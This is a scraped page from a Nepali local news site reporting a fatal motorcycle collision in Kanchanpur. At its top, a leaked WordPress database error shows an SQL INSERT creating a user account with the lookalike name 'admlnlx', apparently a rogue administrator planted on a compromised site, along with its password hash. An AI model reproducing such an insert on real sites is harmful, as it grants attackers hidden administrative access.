WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bg0Iz4bluavOb8uYxEPmLmoNUUirUt/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 14:19:27', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
मोटरसाइकल दुर्घटनामा दुईको मत्यु – Gaule Khabar

मोटरसाइकल दुर्घटनामा दुईको मत्यु

मोटरसाइकल दुर्घटनामा दुईको मत्यु

कञ्चनपुर, माघ २५–

कञ्चनपुरको भीमदत्तनगरपालिका–१८ खैरभट्टीमा आज मोटरसाइकल दुर्घटना हुँदा दुई युवकको मृत्यु भएको छ भने तीनजना घाइते भएका छन् ।

जिल्ला प्रहरी कार्यालय, कञ्चनपुरका प्रहरी नायब उपरीक्षक नैनसिंह कार्कीका अनुसार से ५ प २२६४ र म १ प ३६३४ एक आपसमा ठोक्किँदा कैलालीको धनगढीस्थित तारानगरका २२ वर्षीय सुरज पार्की र कञ्चनपुरको बेदकोट नगरपालिका–२ भम्काका २३ वर्षीय रहिस ओखेडाको मृत्यु भएको छ ।

मृतकद्वय पार्की र ओखेडा से ५ प २२६४ नं को मोटरसाइकलमा सवार थिए । त्यसैगरी, म १ प ३६३४ मा सवार भीमदत्तनगरपालिका–१८ खैरभट्टीका ४१ वर्षीय मेखराज भण्डारी, उहाँकी श्रीमती र छोरा घाइते भएको जिल्ला प्रहरी कार्यालयले जनाएको छ ।

घाइतेको महाकाली अञ्चल अस्पतालमा उपचार भइरहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका